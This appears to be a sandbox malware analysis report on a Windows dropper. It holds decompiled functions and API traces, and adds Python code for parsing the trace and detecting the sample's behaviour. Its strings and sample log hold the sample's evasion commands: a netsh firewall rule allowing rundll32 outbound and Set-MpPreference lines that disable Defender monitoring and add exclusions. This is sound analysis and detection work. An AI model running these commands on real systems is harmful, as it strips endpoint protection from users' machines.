                                                                0x004027c2
                                                                0x004027c3
                                                                0x004027c4
                                                                0x004027c9
                                                                0x004027cc
                                                                0x004027cc
                                                                0x0040277c
                                                                0x0040267b
                                                                0x0040266e
                                                                0x00402670
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000

                                                                APIs
                                                                • lstrcpyA.KERNEL32(036A101C,-00000006,00000000,036A1428,003F1319,00401FDD,C:\Users\user\AppData\Local\Temp\oh161a161.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,oh161a161.bat,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat,00001388,kernel32,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91), ref: 0040259B
                                                                • GetCommandLineA.KERNEL32(036A101C,-00000006,00000000,036A1428,003F1319,00401FDD,C:\Users\user\AppData\Local\Temp\oh161a161.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,oh161a161.bat,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat,00001388,kernel32,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91), ref: 004025AE
                                                                • lstrlenA.KERNEL32(00000000,036A101C,-00000006,00000000,036A1428,003F1319,00401FDD,C:\Users\user\AppData\Local\Temp\oh161a161.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,oh161a161.bat,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat,00001388,kernel32,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91), ref: 004025B6
                                                                • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,00440398,-00000006,00000000,036A1428,003F1319,00401FDD,C:\Users\user\AppData\Local\Temp\oh161a161.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,oh161a161.bat,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat,00001388), ref: 00402623
                                                                • RegQueryValueExA.ADVAPI32(ProductName,00000000,00443400,Windows 10 Enterprise,00440394,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,00440398,-00000006,00000000,036A1428,003F1319,00401FDD,C:\Users\user\AppData\Local\Temp\oh161a161.bat), ref: 0040264E
                                                                • RegCloseKey.ADVAPI32(ProductName,00000000,00443400,Windows 10 Enterprise,00440394,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,00440398,-00000006,00000000,036A1428,003F1319,00401FDD,C:\Users\user\AppData\Local\Temp\oh161a161.bat), ref: 00402659
                                                                • GetVersion.KERNEL32(ProductName,00000000,00443400,Windows 10 Enterprise,00440394,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,00440398,-00000006,00000000,036A1428,003F1319,00401FDD,C:\Users\user\AppData\Local\Temp\oh161a161.bat), ref: 00402663
                                                                • GetModuleHandleA.KERNEL32(kernel32,ProductName,00000000,00443400,Windows 10 Enterprise,00440394,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,00440398,-00000006,00000000,036A1428,003F1319,00401FDD), ref: 004026F7
                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402706
                                                                • GetCurrentProcess.KERNEL32(036A0FEA,kernel32,ProductName,00000000,00443400,Windows 10 Enterprise,00440394,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,00440398,-00000006,00000000,036A1428,003F1319), ref: 00402717
                                                                • ExitProcess.KERNEL32(kernel32,ProductName,00000000,00443400,Windows 10 Enterprise,00440394,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,00440398,-00000006,00000000,036A1428,003F1319,00401FDD), ref: 00402775
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp
                                                                Similarity
                                                                • API ID: Process$AddressCloseCommandCurrentExitHandleLineModuleOpenProcQueryValueVersionlstrcpylstrlen
                                                                • String ID: C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll$IsWow64Process$ProductName$R$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Windows 10 Enterprise$Z$kernel32$pubi
                                                                • API String ID: 3264404344-175066380
                                                                • Opcode ID: 088f9962cafd2997cd9a53981121378ce658c8a836929189c8bfbdf98bcfe1b9
                                                                • Instruction ID: a6c6d2760ff8f028cd5588f6383ab57099b3c3b6c15ba4960ab4bc131dd8bfd0
                                                                • Opcode Fuzzy Hash: 088f9962cafd2997cd9a53981121378ce658c8a836929189c8bfbdf98bcfe1b9
                                                                • Instruction Fuzzy Hash: DB4129346443007AFB256725CD5AB3BAA95AB5A708F14443FF584B72D2DBFC8C014B1E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%
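The API lines in this report follow a fixed shape, `• Api.Module(arg,arg,...), ref: address`, with the logged stack values printed as hex words or as the strings they pointed to. Triage of a long report is faster when those lines are parsed once and the file paths, registry keys and decoded access masks are pulled out automatically. The following is an added example, not part of the Joe Sandbox report or of the sample; the input is a constructed, shortened excerpt of the API lines shown above (argument lists trimmed), and only the argument positions that follow the documented Win32 prototypes (RegOpenKeyExA, OpenProcessToken, GetProcAddress) are decoded.

```python
import re
from dataclasses import dataclass, field

# Constructed input: a shortened excerpt of the API lines in the listing above
# (argument lists trimmed); the format is "• Api.Module(args), ref: address".
SAMPLE_LISTING = r"""
• lstrcpyA.KERNEL32(036A101C,-00000006,00000000,C:\Users\user\AppData\Local\Temp\oh161a161.bat,kernel32,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll), ref: 0040259B
• RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,00440398), ref: 00402623
• RegQueryValueExA.ADVAPI32(ProductName,00000000,00443400,Windows 10 Enterprise,00440394), ref: 0040264E
• GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402706
• OpenProcessToken.ADVAPI32(000000FF,00000008,00447223,004011A7), ref: 00402A04
• GetTokenInformation.ADVAPI32(00000019,004473AF(TokenIntegrityLevel),00001388,00447227), ref: 00402A24
• OpenMutexA.KERNEL32 ref: 0040127B
"""

API_LINE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>[\w.]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")
WIN_PATH = re.compile(r'[A-Za-z]:\\[^,"()]+')

HKEY_ROOTS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
              0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_READ = 0x20019      # winreg.h
TOKEN_QUERY = 0x0008    # winnt.h


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int
    notes: list = field(default_factory=list)


def hexval(tok):
    """Interpret a logged argument as a hex number, or None if it is a string."""
    try:
        return int(tok, 16)
    except ValueError:
        return None


def parse_listing(text):
    """Turn every API line into an ApiCall; headers such as 'APIs' are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def annotate(call):
    """Decode the argument positions that follow the Win32 prototype."""
    a = call.args
    if call.api.startswith("RegOpenKeyEx") and len(a) >= 4:
        root = HKEY_ROOTS.get(hexval(a[0]), a[0])
        sam = hexval(a[3])
        sam_txt = f"0x{sam:x}" if sam is not None else a[3]
        call.notes.append(f"opens {root}\\{a[1]} with samDesired {sam_txt}"
                          + (" (KEY_READ)" if sam == KEY_READ else ""))
    elif call.api == "OpenProcessToken" and len(a) >= 2 and hexval(a[1]) == TOKEN_QUERY:
        call.notes.append("opens own token with TOKEN_QUERY")
    elif call.api == "GetTokenInformation" and any("TokenIntegrityLevel" in x for x in a):
        call.notes.append("queries TokenIntegrityLevel (elevation check)")
    elif call.api == "GetProcAddress" and len(a) >= 2:
        call.notes.append(f"resolves {a[1]} at run time")
    return call


def triage(text):
    """Parse a listing and collect file-system and registry indicators."""
    calls = [annotate(c) for c in parse_listing(text)]
    iocs = {"files": set(), "registry": set()}
    for c in calls:
        for arg in c.args:
            for path in WIN_PATH.findall(arg):
                iocs["files"].add(path)
        if c.api.startswith("RegOpenKeyEx") and len(c.args) >= 2:
            root = HKEY_ROOTS.get(hexval(c.args[0]))
            if root:
                iocs["registry"].add(f"{root}\\{c.args[1]}")
    return calls, iocs


if __name__ == "__main__":
    calls, iocs = triage(SAMPLE_LISTING)
    for c in calls:
        print(f"{c.ref:08x} {c.module}!{c.api}  {'; '.join(c.notes)}")
    print(sorted(iocs["files"]))
    print(sorted(iocs["registry"]))
```

The sandbox prints raw stack slots, so argument positions only line up with the Win32 prototype for some calls (RegOpenKeyExA, OpenProcessToken and GetProcAddress match here; RegQueryValueExA and GetTokenInformation do not), which is why the decoder keys on the API name and falls back to plain string matching elsewhere.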

                                                                Strings
                                                                • setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe", xrefs: 0040100F
                                                                • netsh.exe, xrefs: 00401058
                                                                • C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe, xrefs: 0040107B, 00401085, 0040109E, 004010C0
                                                                • jdfddn, xrefs: 004010E3
                                                                • system32\WindowsPowershell\v1.0\powershell.exe, xrefs: 00401099
                                                                • open, xrefs: 00401051
                                                                • Set-MpPreference -DisableBehaviorMonitoring $true ; Set-MpPreference -MAPSReporting 0 ; Set-MpPreference -ExclusionProcess rundll32.exe ; Set-MpPreference -ExclusionExtension dll, xrefs: 004010C7
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp
                                                                Similarity
                                                                • API ID:
                                                                • String ID: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe$Set-MpPreference -DisableBehaviorMonitoring $true ; Set-MpPreference -MAPSReporting 0 ; Set-MpPreference -ExclusionProcess rundll32.exe ; Set-MpPreference -ExclusionExtension dll$jdfddn$netsh.exe$open$setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe"$system32\WindowsPowershell\v1.0\powershell.exe
                                                                • API String ID: 0-3903124303
                                                                • Opcode ID: 3b5f3102be3a5c2b6ad2516d9c7cb8dff5ad41469834a22de65043ea401f9948
                                                                • Instruction ID: f82359284f8132bfcf2921efccf0bb16aaf7385792bbad63a148d7396f49b813
                                                                • Opcode Fuzzy Hash: 3b5f3102be3a5c2b6ad2516d9c7cb8dff5ad41469834a22de65043ea401f9948
                                                                • Instruction Fuzzy Hash: A28178A584E3C04FD3039BB19965A903FB19F17215F1E41EBD080EF6E3D6AC591AC72A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%
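The strings above are the sample's defence-evasion step: a `netsh advfirewall` rule that lets `rundll32.exe` talk outbound, and a `Set-MpPreference` chain that turns off Defender behaviour monitoring and MAPS cloud reporting and excludes `rundll32.exe` and the `.dll` extension from scanning, both launched from the dropper in `%TEMP%`. Those command lines are loud in process-creation telemetry. The following is an added example, not part of the report or the sample, of detection logic run over constructed records in an `Image|CommandLine|ParentImage` format; the three positive records mirror the strings above, and the rundll32 rule rests on the inference (not stated by the report) that the `"...\jdfddn.dll",jdfddn` arguments seen elsewhere in this listing are rundll32 `dll,export` command lines.

```python
import re
from dataclasses import dataclass

# Constructed process-creation records (not from the report), one per line:
#   Image|CommandLine|ParentImage
# The first three mirror the commands found in the sample's strings.
SAMPLE_LOG = """\
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe Set-MpPreference -DisableBehaviorMonitoring $true ; Set-MpPreference -MAPSReporting 0 ; Set-MpPreference -ExclusionProcess rundll32.exe ; Set-MpPreference -ExclusionExtension dll|C:\\Users\\user\\AppData\\Local\\Temp\\cyscuq0veku\\safebits.exe
C:\\Windows\\System32\\netsh.exe|netsh.exe advfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\\Windows\\system32\\rundll32.exe"|C:\\Users\\user\\AppData\\Local\\Temp\\cyscuq0veku\\safebits.exe
C:\\Windows\\System32\\rundll32.exe|rundll32.exe "C:\\Users\\user\\AppData\\Roaming\\IDFcan\\jdfddn.dll",jdfddn 6i/91|C:\\Users\\user\\AppData\\Local\\Temp\\cyscuq0veku\\safebits.exe
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe Get-MpPreference|C:\\Windows\\explorer.exe
C:\\Windows\\System32\\rundll32.exe|rundll32.exe shell32.dll,Control_RunDLL|C:\\Windows\\explorer.exe
"""

# Defender settings the sample turns off or widens; each alternative is one of
# the Set-MpPreference switches seen in the strings above.
DEFENDER_TAMPER = re.compile(
    r"Set-MpPreference\s+-(?:DisableBehaviorMonitoring\s+\$true|MAPSReporting\s+0\b"
    r"|ExclusionProcess\b|ExclusionExtension\b)", re.IGNORECASE)
# "program=" of a firewall allow rule pointing at a proxy-execution binary.
LOLBIN_PROGRAM = re.compile(
    r'program="?[^"\s]*\\(?:rundll32|regsvr32|mshta|wscript|cscript)\.exe', re.IGNORECASE)
# rundll32 loading a DLL from the user profile with the "dll,export" syntax.
USERDIR_DLL = re.compile(
    r'\\AppData\\(?:Roaming|Local)\\[^"]*\.dll"?\s*,\s*\w+', re.IGNORECASE)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    rule: str
    image: str
    parent: str
    parent_in_temp: bool


def classify(image, cmdline):
    """Return the names of every rule the (image, command line) pair matches."""
    hits = []
    exe = image.rsplit("\\", 1)[-1].lower()
    low = cmdline.lower()
    if exe == "powershell.exe" and DEFENDER_TAMPER.search(cmdline):
        hits.append("defender_tamper")
    if (exe == "netsh.exe" and "advfirewall firewall add rule" in low
            and "action=allow" in low and LOLBIN_PROGRAM.search(cmdline)):
        hits.append("firewall_allow_lolbin")
    if exe == "rundll32.exe" and USERDIR_DLL.search(cmdline):
        hits.append("rundll32_userdir_dll")
    return hits


def scan(log_text):
    """Run the rules over every record. The parent path is kept so an analyst
    can see that all three commands come from the same dropper in %TEMP%."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        image, cmdline, parent = line.split("|", 2)
        for rule in classify(image, cmdline):
            findings.append(Finding(rule, image, parent, bool(TEMP_DIR.search(parent))))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        flag = "parent in %TEMP%" if f.parent_in_temp else ""
        print(f"{f.rule:24} {f.image}  <- {f.parent}  {flag}")
```

The firewall rule deliberately requires `action=allow` and a proxy-execution binary in `program=`, so an administrator's block rule or an allow rule for a normal application does not fire; the Defender rule matches the individual switches rather than the whole chain, because the same tampering split across several PowerShell invocations should still be caught.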

                                                                C-Code - Quality: 89%
                                                                			E00401218(void* __eax, CHAR* __edx) {
                                                                				void* _t5;
                                                                				CHAR* _t11;
                                                                
                                                                				_t11 = __edx;                       /* mutex name supplied by the caller */
                                                                				if(__eax > 5 && __eax > 1) {        /* decompiler kept both compares; only __eax > 5 matters */
                                                                					/* Build "<WinDir>\system32\WindowsPowershell\v1.0\powershell.exe" in the global buffer
                                                                					   at 0x44039c; the decompiler prints the buffer's contents at trace time (the
                                                                					   safebits.exe path) rather than its address. */
                                                                					GetWindowsDirectoryA("C:\Users\jones\AppData\Local\Temp\cyscuq0veku\safebits.exe", 0x3e8);
                                                                					if( *((char*)(lstrlenA(?str?) - 1 + 0x44039c)) != 0x5c) {   /* no trailing backslash? */
                                                                						lstrcatA("C:\Users\jones\AppData\Local\Temp\cyscuq0veku\safebits.exe", "\\system32\\WindowsPowershell\\v1.0\\powershell.exe");
                                                                					} else {
                                                                						lstrcatA("C:\Users\jones\AppData\Local\Temp\cyscuq0veku\safebits.exe", "system32\\WindowsPowershell\\v1.0\\powershell.exe");
                                                                					}
                                                                				}
                                                                				 *0x43f5c2 = 1;                      /* global flag: powershell path prepared */
                                                                				ExitThread(0); // executed
                                                                				/* Not reached on the traced path. Single-instance check: open the named mutex with
                                                                				   SYNCHRONIZE (0x100000) and exit if another instance already owns it; the string
                                                                				   list for this function contains "UEFIConfig". */
                                                                				_t5 = OpenMutexA(0x100000, 0, _t11);
                                                                				if(_t5 != 0) {
                                                                					ExitProcess();
                                                                					return _t5;
                                                                				}
                                                                				return _t5;
                                                                			}

                                                                (Per-line instruction addresses for E00401218, 0x00401218 to 0x00401289.)

                                                                APIs
                                                                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,000003E8), ref: 0040122B
                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,000003E8), ref: 00401235
                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,system32\WindowsPowershell\v1.0\powershell.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,000003E8), ref: 0040124E
                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,\system32\WindowsPowershell\v1.0\powershell.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,000003E8), ref: 0040125F
                                                                • ExitThread.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,\system32\WindowsPowershell\v1.0\powershell.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,000003E8), ref: 0040126D
                                                                • OpenMutexA.KERNEL32 ref: 0040127B
                                                                • ExitProcess.KERNEL32(00100000,00000000,UEFIConfig,004012FD,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000), ref: 00401284
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp
                                                                Similarity
                                                                • API ID: Exitlstrcat$DirectoryMutexOpenProcessThreadWindowslstrlen
                                                                • String ID: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe$UEFIConfig$system32\WindowsPowershell\v1.0\powershell.exe
                                                                • API String ID: 3418033457-1397626661
                                                                • Opcode ID: 16ad6863a522af516c56e882266bdbc084bb6eac1fce67c8e9af8491253d9714
                                                                • Instruction ID: 5f815505bf830127fa623745a4342035234a376669614b7acbac926b9fd7e61f
                                                                • Opcode Fuzzy Hash: 16ad6863a522af516c56e882266bdbc084bb6eac1fce67c8e9af8491253d9714
                                                                • Instruction Fuzzy Hash: 4EE09250AB43C0A5FA2137B50CCBFAD0985474DF0AF5420AFBA82B45E2C6FC0551462E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • SetErrorMode.KERNELBASE(00000002), ref: 0046EA5B
                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0046EADF
                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 0046EBBC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811171169.000000000044B000.00000020.00020000.sdmp, Offset: 0044B000, based on PE: false
                                                                Similarity
                                                                • API ID: AllocErrorExecuteModeShellVirtual
                                                                • String ID: 55235235$<$c:\windows\hh.exe${
                                                                • API String ID: 1049021307-292853099
                                                                • Opcode ID: 21797e6639d023dd5397f78846b2e0d1a48e08e216e9724ca8d2ff4dd303e3d0
                                                                • Instruction ID: 25ad65df9d6a0f3725208dde777aa6ccf33968de0a166632d6b3194e64fc11cd
                                                                • Opcode Fuzzy Hash: 21797e6639d023dd5397f78846b2e0d1a48e08e216e9724ca8d2ff4dd303e3d0
                                                                • Instruction Fuzzy Hash: 41519074E002099FDF40DFA9D982ADEBBF1BF08308F10456AE515F7291E778AD418B59
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • LoadIconA.USER32(004CA030,MAINICON,?,?,?,004509E0), ref: 00463CA1
                                                                • CharLowerA.USER32(?,?,?,?,004509E0), ref: 00463D26
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811171169.000000000044B000.00000020.00020000.sdmp, Offset: 0044B000, based on PE: false
                                                                Similarity
                                                                • API ID: CharIconLoadLower
                                                                • String ID: MAINICON
                                                                • API String ID: 2462297155-2283262055
                                                                • Opcode ID: 13abcb459b5e2e0001c5f9118904a3cc0a52d628095c313acc00973a016e5726
                                                                • Instruction ID: bed1c1fe19d00a89edf3358992f0b46661f9e0ec64f4575b7bd2127a7c7afb8f
                                                                • Opcode Fuzzy Hash: 13abcb459b5e2e0001c5f9118904a3cc0a52d628095c313acc00973a016e5726
                                                                • Instruction Fuzzy Hash: 1E5141706042849FDB50DF29D8C5B857BE4AB15308F0480FAE848DF397EBB9D948CB69
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 37%
                                                                			E00402A3B() {
                                                                
                                                                				/* Decompiler output for a misaligned byte range (quality 37%): the "instructions"
                                                                				   below are not real code. The APIs logged for this region show what actually ran:
                                                                				   OpenProcessToken(TOKEN_QUERY) followed by GetTokenInformation(TokenIntegrityLevel),
                                                                				   i.e. an integrity-level (elevation) check, then ExitProcess. */
                                                                				 *0x00000000 =  *0x00000000;
                                                                				asm("jecxz 0xffffffc3");
                                                                				asm("loope 0x5");
                                                                				return 0;
                                                                			}

                                                                (Per-line instruction addresses for E00402A3B, 0x00402a3d to 0x00402a43.)

                                                                APIs
                                                                • OpenProcessToken.ADVAPI32(000000FF,00000008,00447223,004011A7), ref: 00402A04
                                                                • GetTokenInformation.ADVAPI32(00000019,004473AF(TokenIntegrityLevel),00001388,00447227,000000FF,00000008,00447223,004011A7), ref: 00402A24
                                                                • ExitProcess.KERNEL32(kernel32,ProductName,00000000,00443400,Windows 10 Enterprise,00440394,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,00440398,-00000006,00000000,036A1428,003F1319,00401FDD), ref: 00402A4B
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp
                                                                Similarity
                                                                • API ID: ProcessToken$ExitInformationOpen
                                                                • String ID:
                                                                • API String ID: 1178380199-0
                                                                • Opcode ID: e517496335aaad7309d94258a417eeb5ccc56516b6741c23f993a4ef706d3ca4
                                                                • Instruction ID: c5ecccfb6f3af2e53d24722a026b95e832120dd5f1a89c2c25cf70eb79a9e780
                                                                • Opcode Fuzzy Hash: e517496335aaad7309d94258a417eeb5ccc56516b6741c23f993a4ef706d3ca4
                                                                • Instruction Fuzzy Hash: 46E06834B882000ADE206B119C878123751B306B00F0419F33E60F60E2DBECC822D70C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 86%
                                                                			E00402429() {
                                                                				CHAR* _t2;
                                                                				long _t4;
                                                                
                                                                				/* Launch a child via a SHELLEXECUTEINFO structure at 0x447267. */
                                                                				_t2 = ShellExecuteExA(0x447267);
                                                                				if(_t2 == 0) {
                                                                					__eax = GetLastError();
                                                                					/* 2 = ERROR_FILE_NOT_FOUND, 3 = ERROR_PATH_NOT_FOUND; the body of this branch
                                                                					   was not recovered by the decompiler. */
                                                                					if(__eax != 2 && __eax != 3 && __esi != 0) {
                                                                					}
                                                                				}
                                                                				ExitProcess(); // executed
                                                                				/* Not reached on the traced path: GENERIC_READ|GENERIC_WRITE (0xc0000000),
                                                                				   FILE_SHARE_READ|FILE_SHARE_WRITE (3), FILE_ATTRIBUTE_NORMAL (0x80); the
                                                                				   creation disposition in _t4 was not recovered. */
                                                                				CreateFileA(_t2, 0xc0000000, 3, 0, _t4, 0x80, 0); // executed
                                                                				goto __edx;                         /* indirect jump through a register */
                                                                			}





                                                                0x00402433
                                                                0x00402435
                                                                0x00402437
                                                                0x0040243f
                                                                0x0040243f
                                                                0x0040243f
                                                                0x00402449
                                                                0x00402460
                                                                0x00402468

                                                                APIs
                                                                • ShellExecuteExA.SHELL32(00447267), ref: 0040242E
                                                                • GetLastError.KERNEL32(00447267), ref: 00402437
                                                                • ExitProcess.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,00000258,?,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000BB8,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 00402449
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp
                                                                Similarity
                                                                • API ID: ErrorExecuteExitLastProcessShell
                                                                • String ID:
                                                                • API String ID: 4248680346-0
                                                                • Opcode ID: 85d97c09e9ca1cdca79a6549351a1f57cd034b0e511fa1c6fb03ab76accb3ec5
                                                                • Instruction ID: 6eb9487e8973f127cec04c9ee05d647ed62f1702ae5b4312d7b9ff9e92c22d0b
                                                                • Opcode Fuzzy Hash: 85d97c09e9ca1cdca79a6549351a1f57cd034b0e511fa1c6fb03ab76accb3ec5
                                                                • Instruction Fuzzy Hash: 42C0123158490200D93632A20ACF32B40018A8931CF68283BA002F0BE186EC4801699F
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • SendMessageA.USER32(00000000,00000080,00000001,00000000), ref: 0045FDE0
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811171169.000000000044B000.00000020.00020000.sdmp, Offset: 0044B000, based on PE: false
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID: MDICLIENT
                                                                • API String ID: 3850602802-871263795
                                                                • Opcode ID: e9f059c30c4b5e64c70df3425483389943b1ff42c4d05aa0fae2bd08de8cad1b
                                                                • Instruction ID: 5e8175d6353c0c648ce2e21d853d34f64c58af032ef89aad77947b57623448df
                                                                • Opcode Fuzzy Hash: e9f059c30c4b5e64c70df3425483389943b1ff42c4d05aa0fae2bd08de8cad1b
                                                                • Instruction Fuzzy Hash: E231B1707442406AEB50BF794C86FAA22989B04719F14057FBD55EE2D3CA7C984C876E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0040244E() {
                                                                				CHAR* _t1;   // file path; trace: C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll
                                                                				long _t3;    // creation disposition; trace: 2 = CREATE_ALWAYS
                                                                
                                                                				// 0xc0000000 = GENERIC_READ | GENERIC_WRITE, 3 = FILE_SHARE_READ | FILE_SHARE_WRITE,
                                                                				// 0x80 = FILE_ATTRIBUTE_NORMAL: the dropped DLL is (re)created and opened for writing
                                                                				CreateFileA(_t1, 0xc0000000, 3, 0, _t3, 0x80, 0); // executed
                                                                				goto __edx;
                                                                			}
                                                                
                                                                Instruction addresses: 0x00402460, 0x00402468

                                                                APIs
